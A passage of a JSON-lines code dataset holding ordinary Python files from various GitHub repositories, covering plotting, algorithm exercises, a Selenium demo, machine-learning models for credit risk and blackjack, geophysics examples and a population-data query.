str(to_year)\n loc = 'center'\n font_dict = {'fontsize': 14, 'fontweight': 8.2, 'verticalalignment': 'baseline', 'horizontalalignment': loc}\n plt.title(title, fontdict=font_dict, loc=loc)\n plt.ylabel('Temperature (Celsius)')\n plt.xlabel('Month')\n mean_value = []\n try:\n for key, values in my_list.items():\n try:\n mean_value.append(values)\n plt.boxplot(mean_value)\n except Exception as e:\n print(\"Error in reading key & values in my_list.items():\", e)\n try:\n plt.show()\n except Exception as e:\n print(\"An exception occurred while parsing the key-value pair\", e)\n except Exception as e:\n print(\"An exception occurred while parsing my_list.items()\", e)\n\n","repo_name":"LiamSheng/PyProject","sub_path":"plot_operations.py","file_name":"plot_operations.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3939955507","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n \n # method one ----> using two pointers(no need for extra space o(1)) \n \n slow, fast = head, head\n \n \n while fast and fast.next:\n \n slow = slow.next\n fast = fast.next.next\n \n if slow == fast:\n return True\n \n \n return False\n \n \n \n # method two -----> using hash set to get seen nodes o(n)\n# node_set = set()\n \n# curr = head\n# while curr:\n# if curr in node_set:\n# return True\n \n# node_set.add(curr)\n# curr = curr.next\n# return False\n \n \n ","repo_name":"Beki4382/Competitive-Programming","sub_path":"0141-linked-list-cycle/0141-linked-list-cycle.py","file_name":"0141-linked-list-cycle.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38705843793","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom utilities.handy_wrappers import HandyWrappers\n\nclass DragAndDrop():\n\n def dragAnddrop(self):\n baseUrl = \"http://www.jqueryui.com/droppable/\"\n driver = webdriver.Chrome()\n actions = ActionChains(driver)\n wrap = HandyWrappers(driver)\n driver.maximize_window()\n driver.implicitly_wait(5)\n driver.get(baseUrl)\n\n driver.switch_to.frame(0)\n fromElement = wrap.getElement(\"//body[1]/div[1]\")\n toElement = wrap.getElement(\"//body/div[2]\")\n ActionChains(driver).pause(2).perform()\n\n try:\n #actions.drag_and_drop(fromElement, toElement).perform()\n actions.click_and_hold(fromElement).move_to_element(toElement).release().perform()\n print(\"Drag And Drop Seccessful\")\n ActionChains(driver).pause(2).perform()\n except:\n print(\"Drag And Drop FAILED\")\n\nff = DragAndDrop()\nff.dragAnddrop()","repo_name":"Lunchesque/udemy","sub_path":"python_projects/SeleniumTutorial/ActionChainsClass/drag_and_drop.py","file_name":"drag_and_drop.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32982992424","text":"#!/usr/bin/env python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import roc_auc_score, accuracy_score, mean_squared_error as MSE\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import confusion_matrix, classification_report\n\nfrom printdescribe import changepath\n\nfrom mmodules.load_Data import _loadClean\n\ndatapath = r\"E:\\TimerSeriesAnalysis\\Credit_Risk_Modelling\\Data\"\n\nsns.set_style(\"darkgrid\", {\"grid.color\": \".6\", \"grid.linestyle\": \":\"})\nsp = {\"end\":\"\\n\\n\\n\", \"sep\":\"\\n\\n\"}\n\ncredit = _loadClean()\nprint(credit.head())\n\n# # Create the X and y data sets\nX1_train = credit[\"person_income person_emp_length loan_amnt\".split()]\nX2_train = credit[\"person_income loan_percent_income cb_person_cred_hist_length\".split()]\ny_train = credit[[\"loan_status\"]]\n\n# Print the first five rows of each training set\nprint(X1_train.head())\nprint(X2_train.head())\n\n# Create and train a model on the first training data\nclf_logistic1 = LogisticRegression(solver='lbfgs').fit(X1_train, np.ravel(y_train))\n\n# Create and train a model on the second training data\nclf_logistic2 = LogisticRegression(solver='lbfgs').fit(X2_train, np.ravel(y_train))\n\n# Print the coefficients of each model\nprint(clf_logistic1.coef_, **sp)\nprint(clf_logistic2.coef_, **sp)\n\n\n# Create the X and y data sets\ny = credit[[\"loan_status\"]]\nXraw = credit.drop(columns =[\"loan_status\"])\nscaler = MinMaxScaler()\n\n#################### One-hot encoding credit data ###################\n# Create two data sets for numeric and non-numeric data\ncred_num = Xraw.select_dtypes(exclude=['object'])\ncred_str = Xraw.select_dtypes(include=['object'])\n\n# One-hot encode the non-numeric columns\ncred_str_onehot = pd.get_dummies(cred_str, drop_first=True)\ncred_str_onehot2 = pd.get_dummies(cred_str)\n\nXs = scaler.fit_transform(cred_num)\nXX = pd.DataFrame(Xs, columns=cred_num.columns)\n\n# Union the one-hot encoded columns to the numeric ones\nXall = pd.concat([XX, cred_str_onehot], axis=1)\nXall2 = pd.concat([XX, cred_str_onehot2], axis=1)\n\n# Combine all data and save for analysis\n###########################################\n# alldata = pd.concat([y, Xall], axis=1)\n# alldata2 = pd.concat([y, Xall2], axis=1)\n# with changepath(datapath):\n# alldata.to_csv(\"AnalysisData.csv\", index=False)\n# alldata2.to_csv(\"AnalysisData2.csv\", index=False)\n########################################################\n\n\n# Use test_train_split to create the training and test sets\nX_train, X_test, y_train, y_test = train_test_split(XX, y, test_size=.25, random_state=149, stratify=y)\n\n# Create and fit a logistic regression model\nclf_logistic = LogisticRegression(solver='lbfgs')\nclf_logistic.fit(X_train, np.ravel(y_train))\n\n# Print the parameters of the model\nprint(clf_logistic.get_params(), **sp)\n\n# Print the intercept of the model\nprint(clf_logistic.intercept_, **sp)\n\n# Create predictions of probability for loan status using test data\npreds = clf_logistic.predict_proba(X_test)\n\n# Create dataframes of first five predictions, and first five true labels\npreds_df = pd.DataFrame(preds[:,1][0:5], columns = ['prob_default'])\ntrue_df = y_test.head()\n\n# Concatenate and print the two data frames for comparison\nprint(pd.concat([true_df.reset_index(drop = True), preds_df], axis = 1), \n clf_logistic.score(X_test, y_test),**sp)","repo_name":"jocoder22/TimerSeriesAnalysis","sub_path":"Credit_Risk_Modelling/202_default_probability.py","file_name":"202_default_probability.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1417069113","text":"\"\"\"\nNomes: Gabriel Almeida Mendes - DRE: 117204959\n Marcus Vinicius Torres de Oliveira - DRE: 118142223\n\"\"\"\n\n#Classe que pega o contexto atual do programa,\n#seja uma função, ou até mesmo o programa inteiro\nclass Contexto:\n def __init__(self, display_nome, pai=None, pai_entrando_pos=None):\n self.display_nome = display_nome\n self.pai = pai\n self.pai_entrando_pos = pai_entrando_pos\n self.tabela_simbolo = None\n\n","repo_name":"gabrielred7/compiladores_projfinalpart1","sub_path":"codigos_finais/Contexto.py","file_name":"Contexto.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9711038512","text":"import random\r\nfrom cards import Card # Imports our `cards` module\r\n\r\ndeck = []\r\n# Uses nested `for` loops to make a deck\r\nfor suit_id in range(1, 5):\r\n for rank_id in range(1, 14):\r\n deck.append(Card(suit_id, rank_id))\r\n\r\n# Picks 5 cards from the deck to make a hand\r\nhand = []\r\nfor cards in range(0, 5):\r\n a = random.choice(deck)\r\n hand.append(a)\r\n deck.remove(a)\r\n\r\nprint()\r\nfor card in hand:\r\n print(card.short_name, '=' ,card.long_name, \"Value:\",card.value)\r\n","repo_name":"zhangyiyuan2013/learn_python_book_1","sub_path":"第23章_随机性_代码清单/List_23-5_making_a_deck_of_cards.py","file_name":"List_23-5_making_a_deck_of_cards.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18431335207","text":"from pyspark.sql import SparkSession, functions as F, types as T\n\nclass jsonReader:\n def __init__(self, spark, dataframe):\n self.spark = spark\n self.dataframe = dataframe\n\n def findJSONDataframes(self):\n dataframesInDocument = [self.dataframe]\n columns = self.dataframe.columns\n for x in range(len(self.dataframe.columns)):\n name = self.dataframe.dtypes[x][0]\n Type = self.dataframe.schema[x].dataType\n if isinstance(Type, T.StructType):\n nestedDFColNames = Type.fieldNames()\n newDataframe = spark.createDataFrame([], Type)\n testDF = self.dataframe.withColumn(name, F.from_json(self.dataframe[x], T.MapType(T.StringType(), T.MapType.jsonValue())))\n testDF.show()\n\n return dataframesInDocument\n\n#spark = SparkSession.builder.getOrCreate()\n\n#test = jsonReader(spark, spark.read.option(\"multiline\",\"true\").json(\"sample2.json\"))\n\n#test.dataframe.show()\n#print([tuple(address.values())])\n#newDF = test.dataframe.collect()[0]\n#newDF = spark.createDataFrame([tuple(address.values())], list(address.keys()))\n#test.dataframe = test.dataframe.join(newDF)\n#test.dataframe = test.dataframe.drop('address')\n#test.dataframe.show()\n","repo_name":"RasmusSecher/CleanMyData","sub_path":"CleanMyData/manager/jsonReader.py","file_name":"jsonReader.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2915477079","text":"import tensorflow as tf\nimport numpy as np\nfrom Blackjack_ import BlackjackEnv\nfrom collections import defaultdict\nimport plotting\nimport time\n\n#q network\ndef q_network(\n env,\n sess,\n estimator,\n episode_num=3000,\n discount_factor=0.9,\n epsilon_max=0.1,\n epsilon_min=0.0001\n ):\n #epsilons: decay while sampling\n epsilons = np.linspace(epsilon_max, epsilon_min, episode_num)\n policy = make_epsilon_greedy_policy(estimator, env.nA)\n\n #sample\n for i_episode in range(episode_num):\n state = env.reset()\n #process state\n state_array = state_process(state)\n #initialization for done\n done = False\n while not done:\n #epsilon-greedy policy\n A = policy(sess, state_array, epsilons[i_episode])\n #get action\n action = np.random.choice(np.arange(env.nA), p=A)\n #take action\n next_state, reward, done, info = env.step(action)\n #state process\n next_state_array = state_process(next_state)\n #if done, q(next_s, a') = 0\n if done:\n #target = r + gamma * q(next_s, a')\n q_target = reward + discount_factor * 0.0\n #reshape for tf.train_op\n q_target_array = np.array(q_target).reshape(1)\n action_array = np.array(action).reshape(1)\n print('episode:{}'.format(i_episode))\n print('action:{}'.format(action))\n print('done:{}'.format(done))\n print('q target:{}'.format(q_target))\n print('predictions:{}'.format(estimator.predict(sess, state_array)))\n print('reward:{}'.format(reward))\n print('state:{}'.format(state))\n print('normalization of state:{}'.format(state_array))\n print('='*20)\n #update estimator\n estimator.update(sess, state_array, action_array, q_target_array)\n break\n else:\n #self.predictions: [[q(s, a_1), q(s, a_2)]]\n next_q = estimator.predict(sess, next_state_array)[0]\n #q_target = r + gamma * max(q(next_s))\n q_target = reward + discount_factor * np.max(next_q)\n q_target_array = np.array(q_target).reshape(1)\n action_array = np.array(action).reshape(1)\n print('episode:{}'.format(i_episode))\n print('action:{}'.format(action))\n print('done:{}'.format(done)) \n print('q target:{}'.format(q_target))\n print('predictions:{}'.format(estimator.predict(sess, state_array)))\n print('reward:{}'.format(reward))\n print('state:{}'.format(state))\n print('normalization of state:{}'.format(state_array))\n print('='*20)\n #update estimator\n estimator.update(sess, state_array, action_array, q_target_array)\n #s = next_s\n state = next_state\n \n #get all state and v(s)\n #v(s) is set with max(q(s))\n V = defaultdict(float)\n all_state = []\n for i in range(11, 22):\n for j in range(1, 11):\n for k in [True, False]:\n all_state.append((i, j, k))\n for state in all_state:\n nor_state = state_process(state)\n v_ = np.max(estimator.predict(sess, nor_state))\n V[state] = v_\n #print('V:{}'.format(V))\n return V\n\n#q_value estimator\nclass Estimator(object):\n\n def __init__(self, learning_rate=0.003):\n self.learning_rate = learning_rate\n self._build_model()\n\n def _build_model(self):\n #3 layers\n n_hidden_1 = 8\n n_hidden_2 = 8\n n_input = 3\n n_class = 2\n\n #training params\n self.x_pl = tf.placeholder(tf.float32, [None, n_input])\n self.y_pl = tf.placeholder(tf.float32, [None])\n self.actions_pl = tf.placeholder(tf.int32, [None])\n batch_size = tf.shape(self.x_pl)[0]\n self.w = {\n 'h1':tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2':tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'out':tf.Variable(tf.random_normal([n_hidden_2, n_class]))\n }\n self.b = {\n 'b1':tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2':tf.Variable(tf.random_normal([n_hidden_2])),\n 'out':tf.Variable(tf.random_normal([n_class]))\n }\n\n #layers\n layer_1 = tf.add(tf.matmul(self.x_pl, self.w['h1']), self.b['b1'])\n layer_1 = tf.nn.relu(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, self.w['h2']), self.b['b2'])\n layer_2 = tf.nn.relu(layer_2)\n self.predictions = tf.add(tf.matmul(layer_2, self.w['out']), self.b['out'])\n\n #get predictions under actions just taken\n gather_indices = tf.range(batch_size) * tf.shape(self.predictions)[1] + self.actions_pl\n self.action_predictions = tf.gather(tf.reshape(self.predictions, [-1]), gather_indices)\n #loss, optimizer, init\n #self.losses = tf.nn.softmax_cross_entropy_with_logits(logits=self.action_predictions, labels=self.y_pl)\n #**************\n #use MSE not cross_entropy for better training performance\n #weights are not be updated when use cross entropy as loss fn.\n #**************\n self.losses = tf.square(self.action_predictions - self.y_pl)\n self.loss = tf.reduce_mean(self.losses)\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate)\n self.train_op = self.optimizer.minimize(self.loss)\n \n def predict(self, sess, s):\n #get predictions\n #self.predictions: [[q(s, a_1), q(s, a_2)]]\n return sess.run(self.predictions, {self.x_pl:s})\n \n def update(self, sess, s, a, y):\n #update estimator params\n _ = sess.run(self.train_op, feed_dict={self.x_pl:s, self.y_pl:y, self.actions_pl:a})\n\ndef make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n #q_values: [q(s, a_1), q(s, a_2)]\n q_values = estimator.predict(sess, observation)[0]\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn\n\ndef state_process(state):\n #state process\n state_nor = []\n for i in range(len(state)):\n if i == 0:\n state_nor.append(state[i] / 32.0)\n elif i == 1:\n state_nor.append(state[i] / 22.0)\n else:\n if state[i] == True:\n state_nor.append(1.0)\n else:\n state_nor.append(0.0)\n state_array = np.array(state_nor).reshape(1,3)\n return state_array\n\ndef q_network_test():\n env = BlackjackEnv()\n estimator = Estimator(0.001)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n V = q_network(env, sess, estimator, episode_num=10000)\n plotting.plot_value_function(V, title='Optimal Value Function') \n\ndef main():\n start = time.clock()\n q_network_test()\n print(time.clock() - start)\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"amousni/DRLinBlackjack","sub_path":"Q-network.py","file_name":"Q-network.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33598741540","text":"# Solve 2023-08-28\n\nimport sys\n\ninput = lambda : sys.stdin.readline().rstrip()\n\nli = [int(input()) for _ in range(5)]\n\nko = (li[1] - 1) // li[3] + 1\nmt = (li[2] - 1) // li[4] + 1\n\nprint(li[0] - max(ko, mt))\n","repo_name":"infikei/algorithm","sub_path":"baekjoon_all/05000+/boj_5532.py","file_name":"boj_5532.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"2793843455","text":"\"\"\"\nFrequency domain datapoint\n--------------------------\n\"\"\"\n\n#%%\n# There are two ways in which to create a frequency domain datapoint,\n#\n# 1) :ref:`Instantiating a frequency domain data point`\n#\n# 2) :ref:`Obtaining a datapoint from a dataset`\n#\n# Once instantiated, see :ref:`Using a frequency domain datapoint`\n\n#%%\nfrom os.path import join\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nfrom geobipy import hdfRead\nfrom geobipy import CircularLoop\nfrom geobipy import FdemSystem\nfrom geobipy import FdemData\nfrom geobipy import FdemDataPoint\nfrom geobipy import Model1D\nfrom geobipy import StatArray\nfrom geobipy import Distribution\n\n################################################################################\n# Instantiating a frequency domain data point\n# +++++++++++++++++++++++++++++++++++++++++++\n#\n# To instantiate a frequency domain datapoint we need to define some\n# characteristics of the acquisition system.\n#\n# We need to define the frequencies in Hz of the transmitter,\n# and the geometery of the loops used for each frequency.\n\nfrequencies = np.asarray([380.0, 1776.0, 3345.0, 8171.0, 41020.0, 129550.0])\n\ntransmitterLoops = [CircularLoop(orient='z'), CircularLoop(orient='z'),\n CircularLoop('x', moment=-1), CircularLoop(orient='z'),\n CircularLoop(orient='z'), CircularLoop(orient='z')]\n\nreceiverLoops = [CircularLoop(orient='z', x=7.93), CircularLoop(orient='z', x=7.91),\n CircularLoop('x', moment=1, x=9.03), CircularLoop(orient='z', x=7.91),\n CircularLoop(orient='z', x=7.91), CircularLoop(orient='z', x=7.89)]\n\n################################################################################\n# Now we can instantiate the system.\nfds = FdemSystem(frequencies, transmitterLoops, receiverLoops)\n\n################################################################################\n# And use the system to instantiate a datapoint\n#\n# Note the extra arguments that can be used to create the data point.\n# data is for any observed data one might have, while std are the estimated standard\n# deviations of those observed data.\n#\n# Define some in-phase then quadrature data for each frequency.\ndata = np.r_[145.3, 435.8, 260.6, 875.1, 1502.7, 1516.9,\n 217.9, 412.5, 178.7, 516.5, 405.7, 255.7]\n\nfdp = FdemDataPoint(x=0.0, y=0.0, z=30.0, elevation=0.0,\n data=data, std=None, predictedData=None,\n system=fds, lineNumber=0.0, fiducial=0.0)\n\n###############################################################################\nplt.figure()\n_ = fdp.plot()\n\n################################################################################\n# Obtaining a datapoint from a dataset\n# ++++++++++++++++++++++++++++++++++++\n#\n# More often than not, our observed data is stored in a file on disk.\n# We can read in a dataset and pull datapoints from it.\n#\n# For more information about the frequency domain data set see :ref:`Frequency domain dataset`\n\n################################################################################\n# Set some paths and file names\ndataFolder = \"..//supplementary//Data//\"\n# The data file name\ndataFile = dataFolder + 'Resolve2.txt'\n# The EM system file name\nsystemFile = dataFolder + 'FdemSystem2.stm'\n\n################################################################################\n# Initialize and read an EM data set\nD = FdemData.read_csv(dataFile,systemFile)\n\n################################################################################\n# Get a data point from the dataset\nfdp = D.datapoint(0)\nplt.figure()\n_ = fdp.plot()\n\n################################################################################\n# Using a datapoint\n# +++++++++++++++++\n\n################################################################################\n# We can define a 1D layered earth model, and use it to predict some data\nnCells = 19\npar = StatArray(np.linspace(0.01, 0.1, nCells), \"Conductivity\", \"$\\frac{S}{m}$\")\nthk = StatArray(np.ones(nCells) * 10.0)\nthk[-1] = np.inf\nmod = Model1D(nCells = nCells, parameters=par, widths=thk)\n\n################################################################################\n# Forward model the data\nfdp.forward(mod)\n\n###############################################################################\nplt.figure()\nplt.subplot(121)\n_ = mod.pcolor()\nplt.subplot(122)\n_ = fdp.plot_predicted()\nplt.tight_layout()\n\n################################################################################\n# Compute the sensitivity matrix for a given model\nJ = fdp.sensitivity(mod)\nplt.figure()\n_ = np.abs(J).pcolor(equalize=True, log=10, flipY=True)\n\n################################################################################\n# Attaching statistical descriptors to the datapoint\n# ++++++++++++++++++++++++++++++++++++++++++++++++++\n#\n# Define a multivariate log normal distribution as the prior on the predicted data.\nfdp.predictedData.set_prior('MvLogNormal', fdp.data[fdp.active], fdp.std[fdp.active]**2.0)\n\n################################################################################\n# This allows us to evaluate the likelihood of the predicted data\nprint(fdp.likelihood(log=True))\n# Or the misfit\nprint(fdp.dataMisfit())\n\n################################################################################\n# We can perform a quick search for the best fitting half space\nhalfspace = fdp.FindBestHalfSpace()\nprint('Best half space conductivity is {} $S/m$'.format(halfspace.par))\nplt.figure()\n_ = fdp.plot()\n_ = fdp.plot_predicted()\n\n################################################################################\n# Compute the misfit between observed and predicted data\nprint(fdp.dataMisfit())\n\n\n# Set values of relative and additive error for both systems.\nfdp.relErr = 0.05\nfdp.addErr = 10.0\n\n################################################################################\n# Plot the misfits for a range of half space conductivities\nplt.figure()\n_ = fdp.plotHalfSpaceResponses(-6.0, 4.0, 200)\n\nplt.title(\"Halfspace responses\");\n\n# ################################################################################\n# # We can attach priors to the height of the datapoint,\n# # the relative error multiplier, and the additive error noise floor\n\n\n# # Define the distributions used as priors.\n# heightPrior = Distribution('Uniform', min=np.float64(fdp.z) - 2.0, max=np.float64(fdp.z) + 2.0)\n# relativePrior = Distribution('Uniform', min=0.01, max=0.5)\n# additivePrior = Distribution('Uniform', min=5, max=15)\n# fdp.set_priors(height_prior=heightPrior, relative_error_prior=relativePrior, additive_error_prior=additivePrior)\n\n# ################################################################################\n# # In order to perturb our solvable parameters, we need to attach proposal distributions\n# heightProposal = Distribution('Normal', mean=fdp.z, variance = 0.01)\n# relativeProposal = Distribution('MvNormal', mean=fdp.relErr, variance=2.5e-7)\n# additiveProposal = Distribution('MvLogNormal', mean=fdp.addErr, variance=1e-4)\n# fdp.setProposals(heightProposal, relativeProposal, additiveProposal)\n\n# ################################################################################\n# # With priors set we can auto generate the posteriors\n# fdp.setPosteriors()\n\n# # Perturb the datapoint and record the perturbations\n# for i in range(10000):\n# fdp.forward(mod)\n# fdp.perturb(True, True, True, False)\n# fdp.updatePosteriors()\n\n# ################################################################################\n# # Plot the posterior distributions\n# # fig = plt.figure()\n# # gs = fig.add_gridspec(nrows=1, ncols=1)\n# # ax = fdp.init_posterior_plots(gs[0, 0])\n# # fig.tight_layout()\n\n# # fdp.plot_posteriors(axes=ax, best=fdp)\n\n# import h5py\n# with h5py.File('fdp.h5', 'w') as f:\n# fdp.toHdf(f, 'fdp', withPosterior=True)\n\n# with h5py.File('fdp.h5', 'r') as f:\n# fdp1 = FdemDataPoint.fromHdf(f['fdp'])\n\nprint('done')\nplt.show()","repo_name":"DOI-USGS/geobipy","sub_path":"docs/_downloads/247a416d19dc2e10bf9efc1d5dad114c/plot_frequency_datapoint.py","file_name":"plot_frequency_datapoint.py","file_ext":"py","file_size_in_byte":7950,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"10502993408","text":"import time\nfrom typing import Optional\n\nimport numpy as np\nfrom pbrl.algorithms.runner import BaseRunner\nfrom pbrl.env.env import VectorEnv\n\n\nclass Runner(BaseRunner):\n def __init__(\n self,\n env: VectorEnv,\n max_episode_steps=np.inf,\n render: Optional[float] = None,\n start_timestep: Optional[int] = None\n ):\n super(Runner, self).__init__(\n env=env,\n max_episode_steps=max_episode_steps,\n render=render\n )\n self.start_timestep = start_timestep\n\n def run(self, policy, buffer=None, timestep_num=0, episode_num=0):\n timestep = 0\n episode = 0\n episode_rewards = []\n episode_infos = []\n\n update = buffer is not None\n random = False\n # TD3\n if self.start_timestep is not None:\n random = True\n timestep_num = self.start_timestep\n self.start_timestep = None\n\n while True:\n observations = self.observations\n if update:\n actions, self.states_actor = policy.step(\n observations=observations,\n states_actor=self.states_actor,\n random=random,\n env_num=self.env_num\n )\n else:\n actions, self.states_actor = policy.act(observations, self.states_actor)\n self.observations, rewards, dones, infos = self.env.step(policy.wrap_actions(actions))\n\n timestep += self.env_num\n self.episode_rewards += rewards\n self.episode_steps += 1\n\n if self.render is not None:\n self.env.render()\n time.sleep(self.render)\n\n dones_real = dones & (self.episode_steps < self.max_episode_steps) # TD3' trick\n\n if update:\n policy.normalize_rewards(rewards, True, self.returns, dones_real)\n # add to buffer\n buffer.append(\n observations, # raw obs\n actions,\n self.observations, # raw obs_next\n rewards, # raw reward\n dones_real\n )\n\n for i in range(self.env_num):\n if dones[i]:\n episode += 1\n if policy.rnn:\n policy.reset_state(self.states_actor, i)\n episode_rewards.append(self.episode_rewards[i])\n episode_infos.append(infos[i])\n self.episode_rewards[i] = 0.0\n self.episode_steps[i] = 0\n\n if (timestep_num and timestep >= timestep_num) or (episode_num and episode >= episode_num):\n break\n\n if episode:\n return dict(\n episode=episode,\n timestep=timestep,\n reward=episode_rewards,\n info=episode_infos\n )\n else:\n return dict(timestep=timestep)\n","repo_name":"jjccero/pbrl","sub_path":"pbrl/algorithms/dqn/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"7531632855","text":"import random\nimport re\n\n\ndef get_level():\n while True:\n try:\n prompt = int(input(\"Level: \"))\n if prompt in [1, 2, 3]:\n return int(prompt)\n else:\n raise ValueError\n except ValueError:\n pass\n\n\ndef generate_integer(level):\n if level == 1:\n x = random.randint(0, 9)\n y = random.randint(0, 9)\n elif level == 2:\n x = random.randint(10, 99)\n y = random.randint(10, 99)\n elif level == 3:\n x = random.randint(100, 999)\n y = random.randint(100, 999)\n else:\n raise ValueError\n return x, y\n\n\ndef main():\n incorrect = 0\n score = 0\n level = get_level()\n x, y = generate_integer(level)\n for _ in range(10):\n answer = x + y\n ans = input(f\"{x} + {y} = \")\n if int(ans) == answer:\n score += 1\n incorrect = 0\n x, y = generate_integer(level)\n else:\n for _ in range(2):\n if int(ans) != answer:\n print(\"EEE\")\n ans = input(f\"{x} + {y} = \")\n incorrect += 1\n else:\n score += 1\n incorrect = 0\n x, y = generate_integer(level)\n break\n if incorrect == 2:\n print(\"EEE\")\n print(f'{x} + {y} = {answer}')\n incorrect = 0\n x, y = generate_integer(level)\n print(score)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"xpall/edx-cs50p-psets-clone","sub_path":"misc/professor.py","file_name":"professor.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31150384242","text":"n = 6\ntimes = [7, 10]\n\ndef solution(n, times):\n right = max(times) * n\n left = 1\n \n while left < right:\n mid = (left + right) // 2\n total = 0\n for time in times:\n total += mid // time\n if total >= n:\n right = mid\n else:\n left = mid + 1\n return left\n\nprint(solution(n, times))","repo_name":"JIKMAN/Algorithm","sub_path":"coding_test/programmers_입국심사.py","file_name":"programmers_입국심사.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9345435190","text":"import numpy as np\n\nimport openmdao.api as om\n\n\nclass KappaComp(om.ExplicitComponent):\n r\"\"\" Computes the term kappa in the drag equation:\n\n .. math::\n\n C_D = C_{D0} + \\kappa C_{L\\alpha} \\alpha^2\n\n \"\"\"\n def initialize(self):\n self.options.declare('num_nodes', types=int)\n\n def setup(self):\n nn = self.options['num_nodes']\n\n # Inputs\n self.add_input('mach', shape=(nn,), desc='Mach number', units=None)\n\n # Outputs\n self.add_output(name='kappa', val=np.zeros(nn), desc='induced drag coefficient', units=None)\n\n # Jacobian\n ar = np.arange(nn)\n self.declare_partials(of='kappa', wrt='mach', rows=ar, cols=ar)\n\n def compute(self, inputs, outputs):\n M = inputs['mach']\n\n idx_low = np.where(M < 1.15)[0]\n idx_high = np.where(M >= 1.15)[0]\n\n outputs['kappa'][idx_low] = 0.54 + 0.15 * (1.0 + np.tanh((M[idx_low] - 0.9) / 0.06))\n outputs['kappa'][idx_high] = 0.54 + 0.15 * (1.0 + np.tanh(0.25 / 0.06)) \\\n + 0.14 * (M[idx_high] - 1.15)\n\n def compute_partials(self, inputs, partials):\n M = inputs['mach']\n\n idx_low = np.where(M < 1.15)[0]\n idx_high = np.where(M >= 1.15)[0]\n\n k = 50.0 / 3.0\n tanh = np.tanh(k * (M[idx_low] - 0.9))\n sech2 = 1.0 - tanh**2\n\n partials['kappa', 'mach'][idx_low] = 2.5 * sech2\n partials['kappa', 'mach'][idx_high] = 0.14\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/min_time_climb/aero/kappa_comp.py","file_name":"kappa_comp.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"21981809760","text":"import pandas as pd\nimport json\nfrom datenguidepy import get_statistics, Query\n\n# # Define functions to load datenguide data into data frames\n\n# default values (for testing)\nselected_stats = 'AI1903'\nyear = 2018\n\ndef get_population_all_years():\n '''\n Returns pop [dataframe]: the population for all Hesse regions from datenguide.py with columns 'name', 'year', 'id' and stat values\n '''\n selected_stats = 'BEVSTD' # Bevölkerungsstand (population statistic)\n selected_stats1 = 'R12411' # Fortschreibung des Bevölkerungsstandes (forward projection of populatin statistic)\n \n for _ in range(3): # Database may throw an error on the first query try\n try:\n q = Query.all_regions(parent='06')\n stat = q.add_field(selected_stats)\n stat.add_args({'statistics' : selected_stats1}) # One more level in this stat (exact source of the stat)\n\n pop = q.results(verbose_enums=True, add_units = True)\n break\n except:\n continue\n \n # for some reason entries are produced twice; remove them\n pop.drop_duplicates(inplace=True)\n \n pop = pop[['year', 'id', selected_stats]]\n \n return pop\n\n# Occasional database error when querying BEVSTD or others ('code': 'INTERNAL_SERVER_ERROR')\npop = get_population_all_years()\n#pop = pd.DataFrame() # Use this line in case the previous last line is commented-out\n\ndef get_data_all_years(selected_stats=selected_stats, norm=0, pop=pop):\n '''\n For a given `selected_stats` returns data and unit, where\n data [dataframe]: the chosen statistics from datenguide.py with columns 'name', 'year', 'id' and stat values\n units [string]: name of corresponding unit\n \n Input:\n norm [int]: 0 if no normalization requested, else normalization by population and multiplied by factor norm\n pop [datafram]: dataframe with the 